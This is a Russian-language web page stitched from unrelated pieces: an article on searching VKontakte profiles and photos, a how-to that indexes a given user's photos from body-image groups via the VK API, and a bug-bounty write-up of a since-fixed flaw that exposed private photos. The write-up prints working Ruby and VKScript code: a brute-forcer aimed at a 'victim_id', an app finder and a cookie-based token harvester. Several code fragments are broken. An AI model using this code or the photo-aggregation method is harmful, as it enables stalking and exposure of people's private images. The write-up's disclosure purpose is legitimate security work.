Поисковик частных фотографий по id в вк. Онлайн поиск людей Вконтакте

Интересоваться о том, как осуществлять поиск частной информации Вконтакте , вполне нормально, в этом нет ничего незаконного. По сути, вся социальная сеть состоит из частной информации, которую пользователи предпочли опубликовать в публичном пространстве. Не стоит путать это с незаконным проникновением в личную жизнь пользователей. Известно немало скандалов, связанных с незаконным хищением и распространением частных данных. Один из последних, к примеру, это был взлом аккаунтов известных людей на iCloud с последующей публикацией их интимных фотографий в открытом доступе без их согласия. Позже некоторые публичные люди, среди которых и известная актриса, ныне посол доброй воли в ООН, Эмма Уотсон, заявляли, что их шантажировали перспективой такой же участи.

Стоит ли говорить, что это было низко, бесчеловечно и аморально, не говоря уже о том, что это незаконно? Вряд ли кто-либо по доброй воле захочет быть причастным к подобному скандалу. В этой статье речь пойдет о том, как законными действиями осуществить поиск частной информации Вконтакте, не пересекая границ закона и приличия.

Онлайн поиск людей Вконтакте

Если вы зарегистрированный пользователь ВК, то онлайн поиск людей Вконтакте давно знаком вам вдоль и поперек. Вы всегда можете нажать на слово «Люди» (1) в верхней панели сайта Вконтакте, чтобы попасть на страницу расширенного поиска людей. Если же вы знаете, как человек записан Вконтакте, можно просто набрать его имя в строке поиска. Робот покажет вам всех людей с таким именем. Далее вы сможете либо уточнить поисковые данные, чтобы сузить круг поиска, либо вручную просмотреть все предлагаемые профили, пока не найдёте искомый.

Расширенный поиск (2) предполагает использование таких данных о человеке, как: страна, образование, возраст, пол, семейное положение. Кроме того, если вы не ищете конкретного человека, а формируете группу людей по определенным критериям, интерфейс позволяет отсеивать пользователей без фотографий профиля (часто это новички или заброшенные страницы) и тех, кто на данный момент не онлайн. В разы реже пользователи при поиске используют критерии из раздела «Жизненная позиция», «Военная служба» и «Работа». Если вы совершенно точно уверены в том, что знаете имя пользователя Вконтакте и дату его рождения, можете попытать счастья, введя эти данные в разделе «Дополнительно» (3) расширенного поиска. Но учтите, что далеко не все пользователи указывают эту информацию, и не все говорят правду. Кстати, в общем поиске людей по умолчанию стоит ранжирование по популярности. Знаете, как стать популярным Вконтакте? Мы открываем секрет популярности в . А если вы хотите, чтобы ваша страница выходила при поиске выше других, вам нужно большое и/или друзей.

Отдельно стоит упомянуть о разделе «Возможные друзья», который раньше был доступен на странице с вашими друзьями, но позже был перенесен под боковое меню, на место показа контекстной рекламы. Проблема в том, что некоторые пользователи используют расширение AD-block, успешно блокирующее показ рекламы, а вместе с ней и… возможных друзей. Если вы хотите просмотреть полный список возможных друзей (людей, с которыми у вас есть общие друзья), просто перейдите по этой ссылке . Или зайдите в раздел «Мои друзья» и нажмите на кнопку «Добавить друзей», расположенную справа от строки поиска (4). А можно не искать новых друзей, а у профессионалов.

Поиск фотографий Вконтакте

Будет нелепо, если кто-то начнет поучать вас, как осуществлять поиск фотографий Вконтакте . Обычно для просмотра всех новых добавленных друзьями или сообществами, членом которых вы являетесь, фотографий достаточно зайти в Мои новости и перейти на соответствующую вкладку. Однако некоторое время назад появился сервис, который использует особый алгоритм поиска. Благодаря этому стало возможным просмотреть те фотографии, который пользователь загрузил со своей страницы на стены других людей, а также на стены или в альбомы сообществ. Данный сервис имеет неприглядное название « Скотобаза », на данный момент на сайте проекта сохранено около 150 миллионов различных фотографий.

Каждый должен сам для себя решить, насколько этично пользоваться данным сервисом. Роскомнадзор считает, что через сайт осуществлять поиск фотографий Вконтакте неправильно, так что не единожды предпринимал попытки заблокировать его на территории РФ. Чтобы воспользоваться поиском по фотографиям на данном ресурсе, достаточно вставить ссылку на интересующего вас пользователя в строку поиска. Если в базе есть его фотографии, они сразу же будут вам показаны.

Кстати, если вы сами попали в базу этого сервиса, то не обязательно платить его создателям сумму, которую они за это просят. Гораздо логичнее . К тому же, это бесплатно.

ВКонтакте существует множество пабликов, таких как: 90-60-90, 40 КГ, Спортивные девушки. В данных пабликах пользователи выкладывают фотографии своих фигур, фотографии «до» и «после» диеты / занятия спортом и прочее. Общее количество фотографий в альбомах этих групп порой превышает десятки тысяч. Выкладывая фотографии, многие не задумываются о последствиях, наивно пологая что если кинуть свою фотку в тысячи подобных, то никто ее и не найдет. Под катом описан процесс поиска фотографий конкретного пользователя в группах.

Постановка задачи

1. uid - ID пользователя ВКонтакте
2. gid - ID группы ВКонтакте

Необходимо:

1. Найти все фотографии пользователя uid, опубликованных в группе gid
2. Определить в каком альбоме находится каждая фотография

API ВКонтакте

В контакте отсутствует метод прямого получения фотографий, опубликованных конкретным пользователем в конкретной группе. Однако, добиться нужного результата можно по следующей схеме:
1. Получаем список альбомов, используя метод photos.getAlbums:

VK.api("photos.getAlbums", { gid: gid }, function(result){ if (result.response){ // Список альбомов лежит в массиве result.response // Идентификатор альбома находится в поле aid }else{ // Не удалось получить список альбомов } });

2. Получаем список фотографий, находящихся в альбоме (aid), используя метод photos.get:

VK.api("photos.get", { gid: gid, aid: aid }, function(result){ if (result.response){ // Список фотографий лежит в массиве result.response // ID владельца фотографии содержится в поле owner_id // ID фотографии содержится в поле pid }else{ // Не удалось получить список фотографий в альбоме } });

3. Получаем URL фотографии, используя метод photos.getById

VK.api("photos.getById", { photos: pids }, function(result){ if(result.response){ for(var i=0; i

Как ускорить поиск?

Перебирать все группы довольно длительный процесс и запускать его каждый раз при поиске фотографии конкретного человека дело не целесообразно. Для ускорения поиска достаточно проиндексировать все фотографии путем добавления индекса во внутреннюю таблицу.
В таблице достаточно содержать 3 поля:

• uid - ID пользователя
• gid - ID группы
• pid - ID фотографии

После индексации групп, достаточно выполнить запрос

SELECT * FROM table WHERE uid = uid

Поиск фотографий друзей

Используя метод friends.get, можно получить список друзей, а затем произвести поиск по БД с целью получения фотографий друзей:

VK.api("friends.get", { user_id: uid }, function(result){ if(result.response){ // Далее производим поиск фотографий по ID друзей } });

Ссылки

• Сайт для поиска фотографий: photovk.ru
• Приложение ВКонтакте для поиска фотографий:

tl;dr

Была обнаружена уязвимость в закладках ВК, которая позволяла получать прямые ссылки на приватные фотографии из личных сообщений, альбомов любого пользователя/группы. Был написан скрипт, который перебирал фотографии пользователя за определенный период и затем, через эту уязвимость получал прямые ссылки на изображения. Если коротко, то: можно было за 1 минуту получить все ваши вчерашние фотографии, за 7 минут - все фото, загруженные на прошлой неделе, за 20 минут - прошлый месяц, за 2 часа - прошлый год. Уязвимость на данный момент исправлена. Администрация ВКонтакте выплатила вознаграждение в 10к голосов.

При добавлении ссылки сервер парсит её, пытается выяснить, на какую сущность она ссылается и достает информацию об этом объекте из базы. Как правило, при написании такого рода функций с множеством условий вероятность того, что разработчик что-то забудет, очень высока. Поэтому я не смог себе позволить пройти мимо и решил потратить несколько минут, чтобы немного поэкспериментировать.

В результате мне удалось кое-что найти. При добавлении ссылки на фотографию, заметку или видео, к которым нет доступа, можно было получить немного приватной информации об объекте. В случае с фото и видео - это маленькая (150x150) превьюшка, на которой довольно сложно что-либо разглядеть, у приватных заметок отображалось название. Через метод API fave.getLinks можно было получить ссылки на изображение, но опять же слишком маленького размера (75px и 130px). Так что, по сути, ничего серьезного.

Я решил зайти на мобильную версию сайта, чтобы проверить, отображается ли там всё так же, как и в обычной версии. Заглянув в код странички, я увидел это:

Да! В значении атрибута data-src_big хранилась прямая ссылка на оригинал изображения!

Таким образом, можно было получить прямую ссылку на любое изображение во «Вконтакте», вне зависимости от того, куда оно загружалось и какие настройки приватности имело. Это могло быть изображение из личных сообщений или же фотография из приватных альбомов любого пользователя/группы.

Казалось бы, на этом можно было остановиться и написать разработчикам, но мне стало интересно, возможно ли, эксплуатируя эту уязвимость, получить доступ ко всем (ну или загруженным в определенный период времени) фотографиям юзера. Основной проблемой тут, как вы понимаете, являлось то, что не всегда известна ссылка на приватную фотографию вида photoXXXXXX_XXXXXXX , которую нужно добавить в закладки. В голову пришла мысль о переборе id фотки, но я её почему-то тут же отверг как сумасшедшую. Я проверил связанные с фотографиями методы в API, посмотрел, как приложение работает с альбомами, но никаких утечек, которые могли бы мне помочь получить список с айдишками всех закрытых фоток юзера, найти не удалось. Я уже хотел было бросить эту затею, но взглянув еще раз на ссылку с фотографией, вдруг понял, что перебор таки был хорошей идеей.

Как работают фотографии в ВК

Увы, но, потратив два часа на эксперименты, я так этого и не понял. В 2012 году на HighLoad++ Олег Илларионов сказал несколько слов про то, как они хранят фотографии, про горизонтальный шардинг и случайный выбор сервера для загрузки, но эта информация мне ничего не дала, так как между id сервера и id фотки никакой связи не видно. Понятно, что есть некий глобальный счетчик, но там есть ещё какая-то логика… Потому что если второе число формировалось бы с помощью обычного автоинкремента, то значения айдишок фоток давно бы уже достигли огромных значений (у фб, например, на данный момент это ~700 трлн.), но у «Вконтакте» это значение всего лишь ~400 млн (хотя, судя по статистике, ежедневно пользователи загружают более 30 млн фотографий). Т.е. ясно, что цифра эта не уникальна, но при этом и не рандомная. Я написал скриптик, который прошелся по фотографиям «старых» пользователей и по полученным данным составил график того, на сколько менялась эта цифра с каждым годом :

Видно, что значения скачут в зависимости от каких-то факторов (количества серверов или новой логики?). Но суть в том, что они достаточно малы (особенно за последние 2-3 года) и очень легко вычислить диапазон id для желаемого периода времени. То есть чтобы узнать прямые ссылки на фотки юзера, допустим, за прошлый год, нужно попробовать добавить в закладки всего лишь 30 млн (от _320000000 до _350000000) различных вариаций ссылок! Ниже я описал технику перебора, которая позволила мне проделать это за считанные минуты.

Перебираем фотографии

Ускоряем перебор x25

Var start = parseInt(Args.start); var end = parseInt(Args.end); var victimId = Args.id; var link = "http://vk.com/photo" + victimId + "_"; while(start != end) { API.fave.addLink({ "link": link + start }); start = start + 1; };
Тем самым удалось повысить скорость брутфорса до 3*25 закладок/сек. За прошлый год фотографии перебирались бы долго, но вот для коротких промежутков этот метод перебора уже был довольно-таки неплох.

Ускоряем перебор x25 * количество параллельных запросов в секунду

Для начала нужно было найти (или создать) нужное количество приложений. Был написан скрипт, который ищет standalone приложения в заданном интервале идентификаторов приложений:

Class StandaloneAppsFinder attr_reader:app_ids def initialize(params) @range = params[:in_range] @app_ids = end def search (@range).each do |app_id| response = open("https://api.vk.com/method/apps.get?app_id=#{app_id}").read app = JSON.parse(response)["response"] app_ids << app_id if standalone?(app) end end private def standalone?(app_data) app_data["type"] == "standalone" end end
Можно было еще отбирать приложения по количеству пользователей, дабы еще больше ускорить дальнейший перебор:

Но решил с этим не заморачиваться.

Ок, приложения найдены, теперь им нужно дать разрешение к данным нашего пользователя и получить токены. Для авторизации пришлось использовать механизм Implicit Flow. Пришлось парсить урл авторизации из диалога OAuth и после редиректа вытаскивать токен. Для работы данного класса нужны куки p,l (login.vk.com) и remixsid (vk.com):

Class Authenticator attr_reader:access_tokens def initialize(cookie_header) @cookies = { "Cookie" => cookie_header } @access_tokens = end def authorize_apps(apps) apps.each do |app_id| auth_url = extract_auth_url_from(oauth_page(app_id)) redirect_url = open(auth_url, @cookies).base_uri.to_s access_tokens << extract_token_from(redirect_url) end end private def extract_auth_url_from(oauth_page_html) Nokogiri::HTML(oauth_page_html).css("form").attr("action").value end def extract_token_from(url) URI(url).fragment end def oauth_page(app_id) open(oauth_page_url(app_id), @cookies).read end def oauth_page_url(app_id) "https://oauth.vk.com/authorize?" + "client_id=#{app_id}&" + "response_type=token&" + "display=mobile&" + "scope=474367" end end
Сколько приложений найдено, столько и параллельных запросов. Для распараллеливания всего этого дела было решено использовать гем Typhoeus , который отлично зарекомендовал себя в других задачах. Получился такой вот небольшой брутфорсер:

Class PhotosBruteforcer PHOTOS_ID_BY_PERIOD = { "today" => 366300000..366500000, "yesterday" => 366050000..366300000, "current_month" => 365000000..366500000, "last_month" => 360000000..365000000, "current_year" => 350000000..366500000, "last_year" => 320000000..350000000 } def initialize(params) @victim_id = params[:victim_id] @period = PHOTOS_ID_BY_PERIOD] end def run(tokens) hydra = Typhoeus::Hydra.new tokensIterator = 0 (@period).step(25) do |photo_id| url = "https://api.vk.com/method/execute?access_token=#{tokens}&code=#{vkscript(photo_id)}" encoded_url = URI.escape(url).gsub("+", "%2B").delete("\n") tokensIterator = tokensIterator == tokens.count - 1 ? 0: tokensIterator + 1 hydra.queue Typhoeus::Request.new encoded_url hydra.run if tokensIterator.zero? end hydra.run unless hydra.queued_requests.count.zero? end private def vkscript(photo_id) <<-VKScript var start = #{photo_id}; var end = #{photo_id + 25}; var link = "http://vk.com/photo#{@victim_id}" + "_"; while(start != end) { API.fave.addLink({ "link": link + start }); start = start + 1; }; return start; VKScript end end
Чтобы ещё больше ускорить брутфорс, была попытка избавиться от ненужного тела в ответе, но на HEAD запрос сервер «Вконтакте» возвращает ошибку 501 Not implemented .

Окончательная версия скрипта выглядит так:

Require "nokogiri" require "open-uri" require "typhoeus" require "json" require "./standalone_apps_finder" require "./photos_bruteforcer" require "./authenticator" bruteforcer = PhotosBruteforcer.new(victim_id: ARGV, period: ARGV) apps_finder = StandaloneAppsFinder.new(in_range: 4800000..4800500) apps_finder.search # p,l - cookies from login.vk.com # remixsid - cookie from vk.com authenticator = Authenticator.new("p=;" + "l=;" + "remixsid=;") authenticator.authorize_apps(apps_finder.app_ids) bruteforcer.run(authenticator.access_tokens)
После отработки программы в закладках были все фотографии пользователя за заданный период. Оставалось только зайти в мобильную версию «Вконтакте», открыть консоль браузера, вытащить прямые ссылки и наслаждаться фотографиями в их оригинальном размере.

Итоги

В таблице показано среднее время, необходимое для того, чтобы перепробовать id фотографий за определенный период. Я уверен, всё это можно было ускорить раз так в 10-20. Например, в скрипте брутфорса сделать одну большую очередь из всех запросов и нормальную синхронизацию между ними, т.к. в моей реализации один запрос с timeout будет тормозить весь процесс. Да и вообще, можно было просто купить парочку инстансов на EC2, и за часик получить все фотографии какого угодно пользователя. Но я уже хотел спать.

Да и вообще, не важно, сколько времени злоумышленник на это потратит, 5 часов или же целый день, ведь так или иначе ссылки на приватные изображения он добудет. Возможность железно получить доступ к приватной информации за конечное время – и есть главная угроза, которую несёт данная уязвимость.

Сообщаем об уязвимости